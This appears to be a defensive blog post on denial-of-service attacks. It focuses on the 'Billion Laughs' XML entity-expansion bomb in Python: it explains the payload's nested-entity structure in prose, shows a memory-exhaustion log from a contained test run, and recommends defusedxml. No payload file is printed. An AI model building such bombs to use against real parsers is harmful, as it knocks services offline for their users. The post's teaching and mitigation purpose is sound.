Python DoS Prevention: The Billion Laughs Attack

What is a “Billion Laughs” attack and how can you protect your python applications?

What is DoS?

Before we dig into the “Billion Laughs” attack or how to go about protecting your applications, let me give a quick overview of what DoS is. DoS stands for denial-of-service and makes up a general class of attacks designed to restrict the Availability of an application, service, or company. DoS attacks are fascinating in part because of the huge amount of variability in how they’re executed. I won’t go into much detail here, but here’s are some historic DoS attacks:

DoS attacks generally exist in one of two broad classes, Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS). Both have the same general intent in mind, but they take very different forms.

DoS

DoS attacks are perpetrated by a single attacker and their goal is to make an application, service, or machine unavailable by either flooding it with more request than it can handle, or otherwise consuming resources or processing in such a way that legitimate requests cannot be handled. Within DoS there are two primary categories, Application attacks and Network attacks.

Network attacks, regardless of how they’re executed, generally aim to saturate bandwidth or overwhelm a server by brute force or a flood of malformed requests. DoS Network attacks aren’t too common anymore due to basic firewall configuration and the ability of servers to handle traffic from a single malicious client.

Application layer attacks, also sometime called Layer 7 attacks, involve putting operation strain on the software serving the requests in such a way that it cannot handle additional requests — this is what we’ll be looking at with the Billion Laughs attack.

DDoS

DDoS attacks are denial-of-service attacks in which more that one attacking machines participate. With the rising prevalence of IoT botnets, DDoS attacks are on the upswing.

DDoS attacks appear to be ramping up in terms of magnitude, if not also frequency. The proliferation of IoT devices with poor security controls has led to massive botnets such as Mirai. The controllers of these botnets can rent them out to other malicious actors to power massive DDoS attacks, such as the one against Dyn that crippled large parts of the internet in 2016.

DDoS attacks can also be perpetrated by large groups of active users using simple tools, like in the DDoS attack by Anonymous against a number of financial institutions in 2010 following their refusal to process payments for “News” site Wikileaks.

A Billion Laughs

The Billions Laughs attack is an Application DoS attack aimed at document parsers, typically XML or YAML. It may also be referred to as an XML Bomb. The attack works by having a single base element, which refers to an entity which in turn refers to 10 additional entities, each of which refers to an additional 10 entities, and so on until it ends with a terminating entity that doesn’t refer to any further entities. When parsed this small XML document will be inflated to include a very large number of the terminating entity. The name a “Billion Laughs” comes from the tendency to use “lol” and the entity name, so a fully inflated document would contain a billion “lol”s.

If you attempt to parse this file using the standard library xml.etree.ElementTree it will cause the attack to be triggered and this ~800 byte XML file will result in ~3Gb of memory being used to parse. For this reason I decided to run the experiment in a docker container, with docker imposing a 1Gb limit set in Docker for Mac. My test run script attempts to parse the file using python in the background and logs out the memory usage every second. It only takes about 10 seconds before the process is killed. You can view my setup files here.

$ Docker build . -t vulnerable && docker run vulnerable

...

Using: 7788 Kb

Using: 230172 Kb

Using: 502340 Kb

Using: 779064 Kb

Using: 956980 Kb

Using: 1102780 Kb

Using: 1252228 Kb

Using: 1389968 Kb

Using: 1515664 Kb

Using: 1692576 Kb

./run.sh: line 13: 6 Killed python vulnerable.py

Protection

The library defusedxml was created solely for this purpose. In addition to the Billion Laughs attack, there are several other forms of XML bombs, all of which defusedxml was created to handle. This library was designed to replace the standard xml library’s functionality in a safe way.

Where you would normally do the following to parse an xml file

from xml.etree.ElementTree import parse et = parse(<xml>)

you can change to this to protect yourself from XML bombs in your python applications.

from defusedxml.ElementTree import parse et = parse(<xml>)

Conclusion

As you can see, preventing XML bomb attacks in python is a pretty trivial low hanging fruit to improve your application’s security. Unfortunately there’s no such magic bullet for many other forms of DoS attacks, and DDOS protection is often a risk that can only be mitigated with a high price tag (and even then there are no guarantees). You can view all my code related to this blog here.